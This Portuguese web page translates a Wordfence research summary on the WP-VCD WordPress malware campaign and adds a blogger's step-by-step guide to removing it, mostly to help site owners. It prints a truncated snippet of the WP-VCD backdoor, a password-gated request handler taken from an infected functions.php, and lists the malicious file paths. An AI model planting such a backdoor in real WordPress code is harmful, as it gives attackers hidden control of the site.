Esta entrada foi publicada em Pesquisa , Segurança do WordPress em 4 de novembro de 2019 por Mikey Veenstra.
Uma das infecções por malware mais comuns que o ecossistema do WordPress enfrenta nas últimas semanas é uma campanha conhecida como WP-VCD. Apesar da existência relativamente longa da campanha, a equipe de inteligência de ameaças do Wordfence associou o WP-VCD a uma maior taxa de novas infecções do que qualquer outro malware do WordPress todas as semanas desde agosto de 2019, e a campanha não mostra sinais de desaceleração.
No post de hoje, estamos publicando um white paper abrangente analisando o WP-VCD . Este whitepaper contém todos os detalhes de nossos esforços de pesquisa nessa campanha predominante. Ele foi desenvolvido como um recurso para analistas de ameaças, pesquisadores de segurança, desenvolvedores e administradores do WordPress e qualquer pessoa interessada em rastrear ou impedir o comportamento associado ao WP-VCD.
WP-VCD em resumo
A infecção WP-VCD em si é transmitida por plug-ins e temas “anulados” ou pirateados distribuídos por uma rede de sites relacionados, e é notável na maneira como se propaga após a implantação. Nos bastidores, a extensa infraestrutura de comando e controle (C2) e as infecções de autocorreção permitem que os invasores mantenham uma posição persistente nesses sites infectados.
<?php if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘2f3ad13e4908141130e292bf8aa67474’)) { $div_code_name=”wp_vcd”; switch ($_REQUEST[‘action’]) { case ‘change_domain’; if (isset($_REQUEST[‘newdomain’]))
O snippet de código acima foi originado de um arquivo functions.php infectado em um site comprometido pelo WP-VCD. Devido à prevalência da campanha, é provável que este exemplo seja imediatamente reconhecido por qualquer pessoa com experiência em lidar com infecções por malware do WordPress.
Detalhes completos e análise de código da campanha WP-VCD podem ser encontrados no relatório completo.
Infraestrutura, monetização e atribuição
Em vários pontos de sua história, recursos específicos foram adicionados e removidos do malware, mas a maioria dos componentes principais do WP-VCD permaneceu consistente. A monetização vem de duas fontes principais: atividade de marketing viral destinada a manipular resultados de mecanismos de pesquisa por meio de SEO black hat e código de malvertising que cria redirecionamentos potencialmente perigosos e anúncios pop-up para usuários que visualizam um site comprometido.
No whitepaper, fornecemos algumas dicas sobre a extensão da infraestrutura e do esquema de monetização do WP-VCD. Também revelamos dados que fornecem atribuição ao agente de ameaças por trás da campanha.
Indicadores de compromisso (COI)
Para ajudar a comunidade de segurança na prevenção, detecção e erradicação de infecções por WP-VCD, fornecemos uma extensa lista de COI associados a esta campanha. Também compartilhamos algumas regras de detecção de malware compatíveis com YARA para uso público na identificação de sites infectados.
Leia o relatório completo
O escopo completo de nossa investigação sobre o WP-VCD excede em muito o de uma postagem típica de um blog de pesquisa; portanto, leia o whitepaper completo:
WP-VCD: o malware que você instalou em seu próprio site .
Resolva o ataque de malware WP-VCD
Se você foi vítima de um ataque de malware, sabe como pode ser doloroso se livrar dessas sanguessugas traquinas. Recentemente, um dos sites que eu administrei foi vítima de um vírus WP-VCD Malware. O que eu pensei que seria um processo irritantemente longo para consertar, na verdade não levou muito tempo.
Como o WP-VCD trava em um site?
Existem várias maneiras pelas quais o malware pode se conectar ao seu site, as formas mais comuns para os ataques de vertente de malware WP-VCD são:
Baixando e instalando temas gratuitos do WordPress piratas premium e instalando-os.
Baixando e instalando plugins desonestos gratuitos.
Os desenvolvedores criam portas traseiras para o software acima, o que deixa seu site vulnerável a ataques no futuro.
No meu caso, baixei um tema premium gratuitamente por um tempo para testá-lo antes de comprá-lo. Parece que uma porta dos fundos foi incorporada ao código e se espalhou por todas as instalações locais, mesmo as mais recentes.
“Importante: Não baixe temas e plugins premium de graça!”
Veja como corrigi-lo de maneira rápida e fácil.
1. Identifique o tipo de malware
Se você identificou o vírus do malware e tem certeza de que seu WP-VCD, prossiga para a etapa 2. Se não tiver certeza, os seguintes sintomas podem ajudá-lo a solucionar esta etapa.
Seu site está apresentando um erro de status de cabeçalho 500 por um motivo incomum.
Examine o diretório do seu domínio, se você encontrar um arquivo wp-vcd.php no diretório / wp-includes /. provavelmente é o WP-WCD.
Entre no seu cliente FTP e crie um backup dos arquivos do seu site no seu local. mantenha-os sem modificação, caso você exclua um arquivo e precise ser substituído.
3. Exclua os seguintes arquivos maliciosos
Para os especialistas em malware WP-WCD que começaram a excluir os seguintes arquivos – deixei comentários da minha correção real para usar como orientação sobre o que funcionou para mim.
Não foi possível encontrar esses arquivos, procurei em toda a pasta – o local desses arquivos não foi especificado.
Navegue até wp-includes e delete estes arquivos:
wp-includes/wp-vcd.php – Este é o arquivo principal que injeta o vírus nos outros arquivos
wp-includes/class.wp.php– Não excluiu este, pois quebrou os estilos no site. Eu o inspecionei para encontrar injeções de wcd e nada foi encontrado.
wp-includes/wp-cd.php – Este arquivo também não foi encontrado.
wp-includes/wp-feed.php – Excluído sem problemas
wp-includes/wp-tmp.php – Excluído sem problemas
4. Excluir código malicioso do arquivo Theme Functions.php
Navegue até o local do arquivo do tema para encontrar o functions.phparquivo do tema . O caminho geralmente se parece com: \wp-content\themes\{choose your active theme}
Abra o functions.php arquivo e remova o código do malware.
Geralmente, são cerca de 150 ou mais linhas inseridas na primeira função
Salve e você deve estar pronto!
5. Excluir usuários suspeitos
Verifique os usuários do banco de dados e os usuários do site WP para ver se foram criadas contas suspeitas. Exclua estes.
6. Instale a proteção no seu site
Instale um plugin do WordPress para ajudar a identificar e proteger seu site contra malware. Eu recomendo o Wordfence Security – Firewall & Malware Scan , que ajuda a identificar e bloquear malware.
Usamos cookies em nosso site para fornecer uma experiência mais relevante, lembrando suas preferências e visitas repetidas. Ao clicar em “Aceitar”, concorda com a utilização de TODOS os cookies.
Este site usa cookies para melhorar a sua experiência enquanto navega pelo site. Destes, os cookies que são categorizados como necessários são armazenados no seu navegador, pois são essenciais para o funcionamento das funcionalidades básicas do site. Também usamos cookies de terceiros que nos ajudam a analisar e entender como você usa este site. Esses cookies serão armazenados em seu navegador apenas com o seu consentimento. Você também tem a opção de cancelar esses cookies. Mas a desativação de alguns desses cookies pode afetar sua experiência de navegação.
Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.
Cookie
Duração
Descrição
__cfduid
1 month
The cookie is used by cdn services like CloudFare to identify individual clients behind a shared IP address and apply security settings on a per-client basis. It does not correspond to any user ID in the web application and does not store any personally identifiable information.
cookielawinfo-checkbox-advertisement
1 year
The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Advertisement".
JSESSIONID
Used by sites written in JSP. General purpose platform session cookies that are used to maintain users' state across page requests.
Os cookies funcionais ajudam a realizar certas funcionalidades, como compartilhar o conteúdo do site em plataformas de mídia social, coletar feedbacks e outros recursos de terceiros.
Os cookies de desempenho são usados para entender e analisar os principais índices de desempenho do site, o que ajuda a fornecer uma melhor experiência do usuário para os visitantes.
Cookie
Duração
Descrição
YSC
session
This cookies is set by Youtube and is used to track the views of embedded videos.
Cookies analíticos são usados para entender como os visitantes interagem com o site. Esses cookies ajudam a fornecer informações sobre as métricas do número de visitantes, taxa de rejeição, origem do tráfego, etc.
Cookie
Duração
Descrição
_ga
2 years
This cookie is installed by Google Analytics. The cookie is used to calculate visitor, session, campaign data and keep track of site usage for the site's analytics report. The cookies store information anonymously and assign a randomly generated number to identify unique visitors.
_gid
1 day
This cookie is installed by Google Analytics. The cookie is used to store information of how visitors use a website and helps in creating an analytics report of how the wbsite is doing. The data collected including the number visitors, the source where they have come from, and the pages viisted in an anonymous form.
Os cookies de publicidade são usados para fornecer aos visitantes anúncios e campanhas de marketing relevantes. Esses cookies rastreiam visitantes em sites e coletam informações para fornecer anúncios personalizados.
Cookie
Duração
Descrição
IDE
1 year 24 days
Used by Google DoubleClick and stores information about how the user uses the website and any other advertisement before visiting the website. This is used to present users with ads that are relevant to them according to the user profile.
test_cookie
15 minutes
This cookie is set by doubleclick.net. The purpose of the cookie is to determine if the user's browser supports cookies.
VISITOR_INFO1_LIVE
5 months 27 days
This cookie is set by Youtube. Used to track the information of the embedded YouTube videos on a website.
Os cookies necessários são absolutamente essenciais para o funcionamento adequado do site. Esses cookies garantem funcionalidades básicas e recursos de segurança do site, de forma anônima.
Cookie
Duração
Descrição
__cfduid
1 month
The cookie is used by cdn services like CloudFare to identify individual clients behind a shared IP address and apply security settings on a per-client basis. It does not correspond to any user ID in the web application and does not store any personally identifiable information.
cookielawinfo-checkbox-advertisement
1 year
The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Advertisement".
JSESSIONID
Used by sites written in JSP. General purpose platform session cookies that are used to maintain users' state across page requests.
Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.
Cookie
Duração
Descrição
IDE
1 year 24 days
Used by Google DoubleClick and stores information about how the user uses the website and any other advertisement before visiting the website. This is used to present users with ads that are relevant to them according to the user profile.
test_cookie
15 minutes
This cookie is set by doubleclick.net. The purpose of the cookie is to determine if the user's browser supports cookies.
VISITOR_INFO1_LIVE
5 months 27 days
This cookie is set by Youtube. Used to track the information of the embedded YouTube videos on a website.